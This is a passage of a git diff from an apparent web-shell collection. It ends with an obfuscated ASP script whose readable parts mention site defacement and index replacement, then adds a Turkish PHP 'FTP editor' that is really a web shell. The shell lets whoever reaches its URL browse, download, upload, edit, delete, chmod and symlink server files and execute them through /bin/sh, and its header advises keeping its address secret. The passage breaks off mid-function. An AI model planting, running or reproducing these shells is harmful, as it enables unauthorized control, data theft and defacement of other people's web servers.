+<%#@~^VA4AAA==n	N~kE(@#@&EO RO ORO ORR OO RO O@#@&d;4,mm/nF@#@&Kx~+M.WMP.nkE:n~	+aY@#@&	+.9+	P',D5E/OR6W.hvJx.NxJ*@#@&xDXnPx~M+5EdYc0G.s`JUnM+z+rb@#@&jY,EYbVk~',?nD7+. ;D+mO+}4L^O`rHU/RPGKVdJ*@#@&b0~nMDP@!@*,!~Y4n	P@#@&D/wKxknRSDrYPE@!1+xDnD@*Cb:)~),JL+.D [/^Db2YbWU'r@!z^n	YnD@*E@#@&n^/@#@&M+k2W	/nRSDrOPJİş^n:bxk.~$lşmDı^ıJ@#@&nU9Pr0@#@&EDksdcnDG^/dsK.sPUDX+BP	nD9+U@#@&DndaWxknRSDkDn~J@!mxO+.@*@!4.@*@!WWM:~C1YkGU{g~:O4W[{wK/Y@*@!bUw!Y~YHwnxkE4srY,\l^;n'rJz1)Pj)Is)Jr~/bynxWc@*@!&6W.:@*E@#@&@#@&+	NPkE(@#@&EORO ORR OO RO OO RRO@#@&kE8P^Ck++@#@&Gx,+..KDP.nkEh+,U6O@#@&0VlkWM~',Dn;!+dOc0WMh`r3VmdGDr#@#@&j+O~K4%C:Pn,'~jD\n.cZ.+mOr8N+1Y`rHb^DK/G0DRp\dCK:KJ*@#@&bW~P	WDPnD.~{PTPD4+	P@#@&M+/2G	/nRS.bYn,J@!m+	Y.@*_bPb,)~EL+DM N/mMr2YbW	[E@!^n	YnD@*E@#@&+U[,k0@#@&K4%C:PhR6a+	PJV2:E~,JE[0VCdKD[rE~,0l^dn@#@&W(LuKPKc?nx9@#@&0W[smDPx~k+.\.ctOsVAxmKNcW(LuK:n ]/wKU/K+XOb@#@&D/2WUdRADbO+,J@!WKxY~^KVGD{A4kOPkky'l@*@!1+UYD@*~ P.A]İSAIP ~@!4M@*@!mnxOnM@*@!YaYmDnC,/Yzs'vhb[DtlO!uitkT4Y=&X!pB@*EL3W9slM[J@!&O+XYmDnl@*E@#@&.+k2W	/n SDkOn,J@!4M@*@!0GM:,lmDkKU'QPh+DtG[{wWkO@*@!kxa;OPDXa+x/;8skOP7CV!+xErb1)~UbeszErPdby'cW@*@!&0KDh@*r@#@&n	NPk;4@#@&B RRO O ORORR ORO RO @#@&d!4P^Ck+f@#@&./2Kxk+RSDbO+,JE[1\W'rJ@#@&.+kwW	dnRSDbYnPEELY;/LEJ@#@&nU9P/;8@#@&vO R OR O OO O RO ORO @#@&d!4P1C/c@#@&.n/aW	/nRA.bYnPrE[0Essmxkh'rJ@#@&MnkwG	/RhMkDnPrJ'Y!/'Er@#@&UN,/E(@#@&B O ORORR ORO RO ORR O@#@&d!4~mmd*@#@&D/wKxknRSDrYPEELmWaz[rJ@#@&.n/aW	/nRA.bYnPrE[DEd'rJ@#@&n	N~/!8@#@&v O OO O RO ORO ORR OO@#@&/!4P1Cd++@#@&Dn/2G	/nRS.kD+~Er[SrU0VnDLEr@#@&M+kwW	/ hMkO+,JE'DE/LEJ@#@&+	[~/!4@#@&vORR ORO RO ORR OORR O@#@&k;(P^m/G@#@&DdwKxd+ch.rD+Pr@!Vb@*İV0~ÖUmPnE.4CUı	PjkDn/bxn~zY:CV,kçrx,8bD~bx9+6,tm"ıD^lzıxc@!sr@*?Yc~k	N+Xn.Pmx9P.+C[D~?1.kaYrUbxPeC	ıxCPIüV^+zbxc@!Vb@*UGxMl~k	Nna,Alkısl1l3,drYX^+~lzUı,/nD7nD9lU~kkYn~mVıUPJ~wDnVDPbçk	~h4dls4C~bN+ms@!^k@*Grz+^ksP)NChı	PjkDn/bPW.+tGdDFfRSn(/Cs4mRmK:Jhl4:;Y,/r"9+PSn4kl:(C[l	P6Dn+4GkYq&cA+(/Ch(lR^Gszhl4d!x~9kH+4bD,z+MPCV9ığıxı"ı~7lDkCXmVı:@!sr@*UY,kUNnaD~l	[PM+C[DPd^Mk2YbUbPWM+tWkY8fRS+8/m:8CcmWs&:mt/!U&k	N6nD Ckw~ob8k,XüVsNkUr.R@!Vb@*_l"ıMVmNığıxı.PbUN6rNPCz	ıPX.+,lYDıUı"R@!Vb@*Şr:[r,MnV9rPnE.8mxl~r	Nn6b~mYhmXmP/DPbUN6nD,lU[,D+m[+MP/1.rwDk	NnP@!WKxOP1GVKDx2bx3@*HD[+	@!J0G	Y@*PXmymUPH+.+,lOC1lğı:ı.~k	N+Xrhk.k	PCNıUı~Hl"ıXK.E.Rcr	N+a 4YhV,Lb4r*@!^k@*@!0KUY,mGVKDx2bx3@*H+M+X@!&0KxD@*~|ıdhı	l~İ/~b9lhıU,+8~nlslkö.ü,4r.NxP(k.r:,3slköD[n	P4b~l^YP9r"k	NPGV[;ğ!Prçk	~RczhC4:EO&bx[+X 4Yh,XmyıXKD!"P(E.Nm3r~bxNaR4Y:,C[lsıx,/rYndbx[+0rPbx[nXB+~LöM+~NğrşbD~s+k+VmP9n0mEsYcld2,0k^Cx9lPKsC4bVbD @!sr@*.nDbzk,MöU[DPP;ş!xCP~CkYığıhı.NmPb9ls~İx9+ak,XnhbşPr^;XKDR@!sr@*~E,kşs+h[P@!0KUY,mGsKD'2r	3@*r0;@!zWKxD@*P0ı/sı~AKşPFl^l^C0R@!^r@*zDYı0~ul^l,bUVChmNız/mUıy,)~hmkV8Gs4@$tKOslr^R1W:,~,4W^X[+sWU@$4WYsCk^RmKh~~,hSh /CUmVO+MGDcW.L,/kOnsk"NU,\n,/bY+,l9hk	P&PsW[smDıx9Cx,XlM[ıhPmVm4rVr.kkUk. Pr@#@&./wGUk+ hMrD+~rJLYEk[rE@#@&+UN,/;8@#@&B RO OO RRO O ORORR OR@#@&dE(P^Ck+%@#@&M+dwKUk+ SDbY+,J@!8D@*@!8D@*@!^n	Y+M@*A!P/1.rwDPt+4Nr~:l.l6ıUNmx~jcKP)[ı	l~5m"ı^:ışOıMR@!4D@*ÜmMnY^k~.PÜ^.Y/b"Pz/w,uG/DVmDıUPPühü	NnPÇmsışıDcR@!8M@*b[./~?mOıMıPFık:ı	lPnW9;x!P!öDü	Yüsns+3,İdYNkğbUry,fK/zlUıU,b[ıxı,zl.ıx  @!4D@*P6OlMnmP$ö^ü:ü,2ğ+MP~Gş/mPulDl~#mDPGn:3Yb. @!(D@*|;D8C	ıx~fKdXmVC.ı	ıPMö.üUDüVnX8bVh3,İçkx,bHUıPU+.\D[n,rVsCxı.PSm"ıhP_N9Pol.VYh+. R,@!8.@*bN.nkPFı/sıUmPPm:,.+Mk,!kMkskMPcö.	)P9l-S+4'Csk1l	-[+WC!VORmdw@!4.@*@!Vk@*HVnD,emwC(k^kDb:@!8D@*?rYNnVbPk	^V!N+^n.k,Ym3rw~n9+.+0~b9:rU,nlUn^kU+,i^lşhm@!(D@*zNsrx,ŞkWD/rUbPÇl^hl@!4D@*jn/kkKx~.n~;WG3bnPG+ğn.^+Dr~ÇmVCDmV,SGTk	Pr^:m@!4M@*jkD+snMkx,#+MkP:C8l	VmDıUıPİU[bDh+,-/cR E@#@&DndaWU/ SDrD+,JJLY!d[rJ@#@&x[~kE4@#@&B OO RRO O ORORR ORO R@#@&WVIEAA==^#~@%>
+</table>
+<%#@~^CQAAAA==d!4~kYHV+mwMAAA==^#~@%>
+<style>body{margin:0px;font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;background-color:#3a3a3a;scrollbar-face-color: #303030;scrollbar-highlight-color: #5d5d5d;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #3a3a3a;scrollbar-arrow-color: #9d9d9d;scrollbar-track-color: #3a3a3a;scrollbar-darkshadow-color: #3a3a3a;}.k1{font-family:Wingdings; font-size:15px;}.k2{font-family:Webdings; font-size:15px;}td{font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;}a{color:#EEEEEE;text-decoration:none;}a:hover{color:#40a0ec;}a:visited{color:#EEEEEE;}a:visited:hover{color:#40a0ec;}input,.kbrtm,select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}textarea{background:#121212;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #121212; border-right:1px solid #5d5d5d; border-bottom:1px solid #5d5d5d; border-top:1px solid #121212;}</style>
+<%#@~^BwAAAA==n	N~kE(oQIAAA==^#~@%>
diff --git a/138shell/I/iMHaPFtp.php.txt b/138shell/I/iMHaPFtp.php.txt
new file mode 100644
index 0000000..2c003b7
--- /dev/null
+++ b/138shell/I/iMHaPFtp.php.txt
@@ -0,0 +1,2061 @@
+<?php
+/*
+ * iMHaPFTP.php - iMHaBiRLiGi Php Ftp Editoru
+ * Copyright (C) 2003-2005  iMHaBiRLiGi <iMHaBiRLiGi@imhabirligi.com>
+ *
+ * Bu Kod Tamamiyle Özgür Yazilimdir.
+ * Kötü Amaclar ile kullanilmamak sartiyla istenildigi gibi Kullanilabilir
+ * Programin amaci ftp olmadan hostunuza baglanti kurup 
+ * Dosya ekleyip kaldira bilmektir.
+ * Kodumuz 6 Dilde yazilmistir.Server Diline Göre Otomatik Secim Yapar.
+ * -------------------------------------------------------------------------
+ * Kodu hosta attiktan sonra adres cubuguna kodun uzantisini verip baglanin
+ * Ve Asla kimseye bu kodun uzantisini vermeyiniz.!!
+ * -------------------------------------------------------------------------
+ *
+ * iMHaBiRLiGi PhpFtp V1.1
+ * =========================================================================
+ *
+ * BeweiS
+ * <BeweiS@imhabirligi.com>
+ *    iMHaBiRLiGi Administrator
+ *    Php-Asp-Programlama ve Güvenlik
+ *
+ * MicroP_
+ * <MicroP_@imhabirligi.com>
+ *    iMHaBiRLiGi Administrator
+ *    Php-Asp-Programlama ve Güvenlik
+ *
+ * Libertical
+ * <libertical@imhabirligi.com>
+ *    iMHaBiRLiGi Yönetim
+ *    C++, Delphi,Programlama ve Linux Hastasi
+ *
+ * PowerGhost
+ * <powerghost@imhabirligi.com>
+ *    iMHaBiRLiGi Sistem Danismani
+ *    Sistem Danismani
+ *    
+ *  BadSector
+ *  ozgurkaleli@yahoo.com
+ *  iMHaBiRLiGi Yönetim
+ *   VicualBasic-Delphi Programlama
+ *   Sistemdanismani ve Linux Hastasi
+ *
+ * Bu kodun yaziliminda ismi gecen her arkadasimizin
+ * Katkilari bulunmustur.
+ * Herbiri ilgi alaninda Basarili olduklari konularda kodumuzu gelistirmemize
+ * Katkida bulunmuslardir.
+ * NOT: Kod Hakkinda takildiniz konulari iMHaBiRLiGi Forumlarina Sora bilirsiniz
+ * http://www.imhabirligi.com
+ *<iMHaBiRLiGi@imhabirligi.com>
+/* ------------------------------------------------------------------------- */
+
+/* Diller :
+ * 'en' - English
+ * 'de' - German
+ * 'fr' - French
+ * 'it' - Italian
+ * 'se' - Swedish
+ * 'auto' - autoselect
+ */
+$lang = 'auto';
+
+/* Charset of your filenames:
+ */
+$charset = 'ISO-8859-1';
+
+/* Homedir:
+ * For example: './' - the script's directory
+ */
+$homedir = './';
+
+/* Size of the Düzenle textarea
+ */
+$Düzenlecols = 80;
+$Düzenlerows = 25;
+
+/* -------------------------------------------
+ * Optional configuration (reTasi # to enable)
+ */
+
+/* Permission of created directories:
+ * For example: 0705 would be 'drwx---r-x'.
+ */
+# $dirpermission = 0705;
+
+/* Permission of created files:
+ * For example: 0604 would be '-rw----r--'.
+ */
+# $filepermission = 0604;
+
+/* Filenames related to the apache web server:
+ */
+$htaccess = '.htaccess';
+$htpasswd = '.htpasswd';
+
+/* ------------------------------------------------------------------------- */
+
+if (get_magic_quotes_gpc()) {
+	array_walk($_GET, 'strip');
+	array_walk($_POST, 'strip');
+	array_walk($_REQUEST, 'strip');
+}
+
+if (array_key_exists('image', $_GET)) {
+	header('Content-Type: image/gif');
+	die(getimage($_GET['image']));
+}
+
+$delim = DIRECTORY_SEPARATOR;
+
+if (function_exists('php_uname')) {
+	$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
+} else {
+	$win = ($delim == '\\') ? true : false;
+}
+
+if (!empty($_SERVER['PATH_TRANSLATED'])) {
+	$scriptdir = dirname($_SERVER['PATH_TRANSLATED']);
+} elseif (!empty($_SERVER['SCRIPT_FILENAME'])) {
+	$scriptdir = dirname($_SERVER['SCRIPT_FILENAME']);
+} elseif (function_exists('getcwd')) {
+	$scriptdir = getcwd();
+} else {
+	$scriptdir = '.';
+}
+$homedir = relative2absolute($homedir, $scriptdir);
+
+$dir = (array_key_exists('dir', $_REQUEST)) ? $_REQUEST['dir'] : $homedir;
+
+if (array_key_exists('olddir', $_POST) && !path_is_relative($_POST['olddir'])) {
+	$dir = relative2absolute($dir, $_POST['olddir']);
+}
+
+$directory = simplify_path(addslash($dir));
+
+$files = array();
+$action = '';
+if (!empty($_POST['submit_all'])) {
+	$action = $_POST['action_all'];
+	for ($i = 0; $i < $_POST['num']; $i++) {
+		if (array_key_exists("checked$i", $_POST) && $_POST["checked$i"] == 'true') {
+			$files[] = $_POST["file$i"];
+		}
+	}
+} elseif (!empty($_REQUEST['action'])) {
+	$action = $_REQUEST['action'];
+	$files[] = relative2absolute($_REQUEST['file'], $directory);
+} elseif (!empty($_POST['submit_upload']) && !empty($_FILES['upload']['name'])) {
+	$files[] = $_FILES['upload'];
+	$action = 'upload';
+} elseif (array_key_exists('num', $_POST)) {
+	for ($i = 0; $i < $_POST['num']; $i++) {
+		if (array_key_exists("submit$i", $_POST)) break;
+	}
+	if ($i < $_POST['num']) {
+		$action = $_POST["action$i"];
+		$files[] = $_POST["file$i"];
+	}
+}
+if (empty($action) && (!empty($_POST['submit_create']) || (array_key_exists('focus', $_POST) && $_POST['focus'] == 'create')) && !empty($_POST['create_name'])) {
+	$files[] = relative2absolute($_POST['create_name'], $directory);
+	switch ($_POST['create_type']) {
+	case 'directory':
+		$action = 'create_directory';
+		break;
+	case 'file':
+		$action = 'create_file';
+	}
+}
+if (sizeof($files) == 0) $action = ''; else $file = reset($files);
+
+if ($lang == 'auto') {
+	if (array_key_exists('HTTP_ACCEPT_LANGUAGE', $_SERVER) && strlen($_SERVER['HTTP_ACCEPT_LANGUAGE']) >= 2) {
+		$lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
+	} else {
+		$lang = 'en';
+	}
+}
+
+$words = getwords($lang);
+
+$cols = ($win) ? 4 : 7;
+
+if (!isset($dirpermission)) {
+	$dirpermission = (function_exists('umask')) ? (0777 & ~umask()) : 0755;
+}
+if (!isset($filepermission)) {
+	$filepermission = (function_exists('umask')) ? (0666 & ~umask()) : 0644;
+}
+
+if (!empty($_SERVER['SCRIPT_NAME'])) {
+	$self = html(basename($_SERVER['SCRIPT_NAME']));
+} elseif (!empty($_SERVER['PHP_SELF'])) {
+	$self = html(basename($_SERVER['PHP_SELF']));
+} else {
+	$self = '';
+}
+
+if (!empty($_SERVER['SERVER_SOFTWARE'])) {
+	if (strtolower(substr($_SERVER['SERVER_SOFTWARE'], 0, 6)) == 'apache') {
+		$apache = true;
+	} else {
+		$apache = false;
+	}
+} else {
+	$apache = true;
+}
+
+switch ($action) {
+
+case 'view':
+
+	if (is_script($file)) {
+
+		/* highlight_file is a mess! */
+		ob_start();
+		highlight_file($file);
+		$src = ereg_replace('<font color="([^"]*)">', '<span style="color: \1">', ob_get_contents());
+		$src = str_replace(array('</font>', "\r", "\n"), array('</span>', '', ''), $src);
+		ob_end_clean();
+
+		html_header();
+		echo '<h2 style="text-align: left; margin-bottom: 0">' . html($file) . '</h2>
+
+<hr />
+
+<table>
+<tr>
+<td style="text-align: right; vertical-align: top; color: gray; padding-right: 3pt; border-right: 1px solid gray">
+<pre style="margin-top: 0"><code>';
+
+		for ($i = 1; $i <= sizeof(file($file)); $i++) echo "$i\n";
+
+		echo '</code></pre>
+</td>
+<td style="text-align: left; vertical-align: top; padding-left: 3pt">
+<pre style="margin-top: 0">' . $src . '</pre>
+</td>
+</tr>
+</table>
+
+';
+
+		html_footer();
+
+	} else {
+
+		header('Content-Type: ' . getmimetype($file));
+		header('Content-Disposition: filename=' . basename($file));
+
+		readfile($file);
+
+	}
+
+	break;
+
+case 'indir':
+
+	header('Pragma: public');
+	header('Expires: 0');
+	header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
+	header('Content-Type: ' . getmimetype($file));
+	header('Content-Disposition: attachment; filename=' . basename($file) . ';');
+	header('Content-Length: ' . filesize($file));
+
+	readfile($file);
+
+	break;
+
+case 'upload':
+
+	$dest = relative2absolute($file['name'], $directory);
+
+	if (@file_exists($dest)) {
+		listing_page(error('already_exists', $dest));
+	} elseif (@Tasi_uploaded_file($file['tmp_name'], $dest)) {
+		listing_page(notice('uploaded', $file['name']));
+	} else {
+		listing_page(error('not_uploaded', $file['name']));
+	}
+
+	break;
+
+case 'create_directory':
+
+	if (@file_exists($file)) {
+		listing_page(error('already_exists', $file));
+	} else {
+		$old = @umask(0777 & ~$dirpermission);
+		if (@mkdir($file, $dirpermission)) {
+			listing_page(notice('created', $file));
+		} else {
+			listing_page(error('not_created', $file));
+		}
+		@umask($old);
+	}
+
+	break;
+
+case 'create_file':
+
+	if (@file_exists($file)) {
+		listing_page(error('already_exists', $file));
+	} else {
+		$old = @umask(0777 & ~$filepermission);
+		if (@touch($file)) {
+			Düzenle($file);
+		} else {
+			listing_page(error('not_created', $file));
+		}
+		@umask($old);
+	}
+
+	break;
+
+case 'execute':
+
+	chdir(dirname($file));
+
+	$output = array();
+	$retval = 0;
+	exec('echo "./' . basename($file) . '" | /bin/sh', $output, $retval);
+
+	$error = ($retval == 0) ? false : true;
+
+	if (sizeof($output) == 0) $output = array('<' . $words['no_output'] . '>');
+
+	if ($error) {
+		listing_page(error('not_executed', $file, implode("\n", $output)));
+	} else {
+		listing_page(notice('executed', $file, implode("\n", $output)));
+	}
+
+	break;
+
+case 'Sil':
+
+	if (!empty($_POST['no'])) {
+		listing_page();
+	} elseif (!empty($_POST['yes'])) {
+
+		$failure = array();
+		$success = array();
+
+		foreach ($files as $file) {
+			if (del($file)) {
+				$success[] = $file;
+			} else {
+				$failure[] = $file;
+			}
+		}
+
+		$message = '';
+		if (sizeof($failure) > 0) {
+			$message = error('not_Sild', implode("\n", $failure));
+		}
+		if (sizeof($success) > 0) {
+			$message .= notice('Sild', implode("\n", $success));
+		}
+
+		listing_page($message);
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+<table class="dialog">
+<tr>
+<td class="dialog">
+';
+
+		request_dump();
+
+		echo "\t<b>" . word('really_Sil') . '</b>
+	<p>
+';
+
+		foreach ($files as $file) {
+			echo "\t" . html($file) . "<br />\n";
+		}
+
+		echo '	</p>
+	<hr />
+	<input type="submit" name="no" value="' . word('no') . '" id="red_button" />
+	<input type="submit" name="yes" value="' . word('yes') . '" id="green_button" style="margin-left: 50px" />
+</td>
+</tr>
+</table>
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'Degistir':
+
+	if (!empty($_POST['Yol'])) {
+
+		$dest = relative2absolute($_POST['Yol'], $directory);
+
+		if (!@file_exists($dest) && @Degistir($file, $dest)) {
+			listing_page(notice('Degistird', $file, $dest));
+		} else {
+			listing_page(error('not_Degistird', $file, $dest));
+		}
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+	<input type="hidden" name="action" value="Degistir" />
+	<input type="hidden" name="file" value="' . html($file) . '" />
+	<input type="hidden" name="dir" value="' . html($directory) . '" />
+	<b>' . word('Degistir_file') . '</b>
+	<p>' . html($file) . '</p>
+	<hr />
+	' . word('Yol') . ':
+	<input type="text" name="Yol" size="' . textfieldsize($file) . '" value="' . html($file) . '" />
+	<input type="submit" value="' . word('Degistir') . '" />
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'Tasi':
+
+	if (!empty($_POST['Yol'])) {
+
+		$dest = relative2absolute($_POST['Yol'], $directory);
+
+		$failure = array();
+		$success = array();
+
+		foreach ($files as $file) {
+			$filename = substr($file, strlen($directory));
+			$d = $dest . $filename;
+			if (!@file_exists($d) && @Degistir($file, $d)) {
+				$success[] = $file;
+			} else {
+				$failure[] = $file;
+			}
+		}
+
+		$message = '';
+		if (sizeof($failure) > 0) {
+			$message = error('not_Tasid', implode("\n", $failure), $dest);
+		}
+		if (sizeof($success) > 0) {
+			$message .= notice('Tasid', implode("\n", $success), $dest);
+		}
+
+		listing_page($message);
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+';
+
+		request_dump();
+
+		echo "\t<b>" . word('Tasi_files') . '</b>
+	<p>
+';
+
+		foreach ($files as $file) {
+			echo "\t" . html($file) . "<br />\n";
+		}
+
+		echo '	</p>
+	<hr />
+	' . word('Yol') . ':
+	<input type="text" name="Yol" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
+	<input type="submit" value="' . word('Tasi') . '" />
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'Kopyala':
+
+	if (!empty($_POST['Yol'])) {
+
+		$dest = relative2absolute($_POST['Yol'], $directory);
+
+		if (@is_dir($dest)) {
+
+			$failure = array();
+			$success = array();
+
+			foreach ($files as $file) {
+				$filename = substr($file, strlen($directory));
+				$d = addslash($dest) . $filename;
+				if (!@is_dir($file) && !@file_exists($d) && @Kopyala($file, $d)) {
+					$success[] = $file;
+				} else {
+					$failure[] = $file;
+				}
+			}
+
+			$message = '';
+			if (sizeof($failure) > 0) {
+				$message = error('not_copied', implode("\n", $failure), $dest);
+			}
+			if (sizeof($success) > 0) {
+				$message .= notice('copied', implode("\n", $success), $dest);
+			}
+
+			listing_page($message);
+
+		} else {
+
+			if (!@file_exists($dest) && @Kopyala($file, $dest)) {
+				listing_page(notice('copied', $file, $dest));
+			} else {
+				listing_page(error('not_copied', $file, $dest));
+			}
+
+		}
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+';
+
+		request_dump();
+
+		echo "\n<b>" . word('Kopyala_files') . '</b>
+	<p>
+';
+
+		foreach ($files as $file) {
+			echo "\t" . html($file) . "<br />\n";
+		}
+
+		echo '	</p>
+	<hr />
+	' . word('Yol') . ':
+	<input type="text" name="Yol" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
+	<input type="submit" value="' . word('Kopyala') . '" />
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'create_symlink':
+
+	if (!empty($_POST['Yol'])) {
+
+		$dest = relative2absolute($_POST['Yol'], $directory);
+
+		if (substr($dest, -1, 1) == $delim) $dest .= basename($file);
+
+		if (!empty($_POST['relative'])) $file = absolute2relative(addslash(dirname($dest)), $file);
+
+		if (!@file_exists($dest) && @symlink($file, $dest)) {
+			listing_page(notice('symlinked', $file, $dest));
+		} else {
+			listing_page(error('not_symlinked', $file, $dest));
+		}
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog" id="symlink">
+<tr>
+	<td style="vertical-align: top">' . word('Yol') . ': </td>
+	<td>
+		<b>' . html($file) . '</b><br />
+		<input type="checkbox" name="relative" value="yes" id="checkbox_relative" checked="checked" style="margin-top: 1ex" />
+		<label for="checkbox_relative">' . word('relative') . '</label>
+		<input type="hidden" name="action" value="create_symlink" />
+		<input type="hidden" name="file" value="' . html($file) . '" />
+		<input type="hidden" name="dir" value="' . html($directory) . '" />
+	</td>
+</tr>
+<tr>
+	<td>' . word('symlink') . ': </td>
+	<td>
+		<input type="text" name="Yol" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
+		<input type="submit" value="' . word('create_symlink') . '" />
+	</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'Düzenle':
+
+	if (!empty($_POST['save'])) {
+
+		$content = str_replace("\r\n", "\n", $_POST['content']);
+
+		if (($f = @fopen($file, 'w')) && @fwrite($f, $content) !== false && @fclose($f)) {
+			listing_page(notice('saved', $file));
+		} else {
+			listing_page(error('not_saved', $file));
+		}
+
+	} else {
+
+		if (@is_readable($file) && @is_writable($file)) {
+			Düzenle($file);
+		} else {
+			listing_page(error('not_Düzenleed', $file));
+		}
+
+	}
+
+	break;
+
+case 'permission':
+
+	if (!empty($_POST['set'])) {
+
+		$mode = 0;
+		if (!empty($_POST['ur'])) $mode |= 0400; if (!empty($_POST['uw'])) $mode |= 0200; if (!empty($_POST['ux'])) $mode |= 0100;
+		if (!empty($_POST['gr'])) $mode |= 0040; if (!empty($_POST['gw'])) $mode |= 0020; if (!empty($_POST['gx'])) $mode |= 0010;
+		if (!empty($_POST['or'])) $mode |= 0004; if (!empty($_POST['ow'])) $mode |= 0002; if (!empty($_POST['ox'])) $mode |= 0001;
+
+		if (@chmod($file, $mode)) {
+			listing_page(notice('permission_set', $file, decoct($mode)));
+		} else {
+			listing_page(error('permission_not_set', $file, decoct($mode)));
+		}
+
+	} else {
+
+		html_header();
+
+		$mode = fileperms($file);
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+
+	<p style="margin: 0">' . phrase('permission_for', $file) . '</p>
+
+	<hr />
+
+	<table id="permission">
+	<tr>
+		<td></td>
+		<td style="border-right: 1px solid black">' . word('owner') . '</td>
+		<td style="border-right: 1px solid black">' . word('group') . '</td>
+		<td>' . word('other') . '</td>
+	</tr>
+	<tr>
+		<td style="text-align: right">' . word('read') . ':</td>
+		<td><input type="checkbox" name="ur" value="1"'; if ($mode & 00400) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="gr" value="1"'; if ($mode & 00040) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="or" value="1"'; if ($mode & 00004) echo ' checked="checked"'; echo ' /></td>
+	</tr>
+	<tr>
+		<td style="text-align: right">' . word('write') . ':</td>
+		<td><input type="checkbox" name="uw" value="1"'; if ($mode & 00200) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="gw" value="1"'; if ($mode & 00020) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="ow" value="1"'; if ($mode & 00002) echo ' checked="checked"'; echo ' /></td>
+	</tr>
+	<tr>
+		<td style="text-align: right">' . word('execute') . ':</td>
+		<td><input type="checkbox" name="ux" value="1"'; if ($mode & 00100) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="gx" value="1"'; if ($mode & 00010) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="ox" value="1"'; if ($mode & 00001) echo ' checked="checked"'; echo ' /></td>
+	</tr>
+	</table>
+
+	<hr />
+
+	<input type="submit" name="set" value="' . word('set') . '" />
+
+	<input type="hidden" name="action" value="permission" />
+	<input type="hidden" name="file" value="' . html($file) . '" />
+	<input type="hidden" name="dir" value="' . html($directory) . '" />
+
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+default:
+
+	listing_page();
+
+}
+
+/* ------------------------------------------------------------------------- */
+
+function getlist ($directory) {
+	global $delim, $win;
+
+	if ($d = @opendir($directory)) {
+
+		while (($filename = @readdir($d)) !== false) {
+
+			$path = $directory . $filename;
+
+			if ($stat = @lstat($path)) {
+
+				$file = array(
+					'filename'    => $filename,
+					'path'        => $path,
+					'is_file'     => @is_file($path),
+					'is_dir'      => @is_dir($path),
+					'is_link'     => @is_link($path),
+					'is_readable' => @is_readable($path),
+					'is_writable' => @is_writable($path),
+					'size'        => $stat['size'],
+					'permission'  => $stat['mode'],
+					'owner'       => $stat['uid'],
+					'group'       => $stat['gid'],
+					'mtime'       => @filemtime($path),
+					'atime'       => @fileatime($path),
+					'ctime'       => @filectime($path)
+				);
+
+				if ($file['is_dir']) {
+					$file['is_executable'] = @file_exists($path . $delim . '.');
+				} else {
+					if (!$win) {
+						$file['is_executable'] = @is_executable($path);
+					} else {
+						$file['is_executable'] = true;
+					}
+				}
+
+				if ($file['is_link']) $file['target'] = @readlink($path);
+
+				if (function_exists('posix_getpwuid')) $file['owner_name'] = @reset(posix_getpwuid($file['owner']));
+				if (function_exists('posix_getgrgid')) $file['group_name'] = @reset(posix_getgrgid($file['group']));
+
+				$files[] = $file;
+
+			}
+
+		}
+
+		return $files;
+
+	} else {
+		return false;
+	}
+
+}
+
+function sortlist (&$list, $key, $reverse) {
+
+	quicksort($list, 0, sizeof($list) - 1, $key);
+
+	if ($reverse) $list = array_reverse($list);
+
+}
+
+function quicksort (&$array, $first, $last, $key) {
+
+	if ($first < $last) {
+
+		$cmp = $array[floor(($first + $last) / 2)][$key];
+
+		$l = $first;
+		$r = $last;
+
+		while ($l <= $r) {
+
+			while ($array[$l][$key] < $cmp) $l++;
+			while ($array[$r][$key] > $cmp) $r--;
+
+			if ($l <= $r) {
+
+				$tmp = $array[$l];
+				$array[$l] = $array[$r];
+				$array[$r] = $tmp;
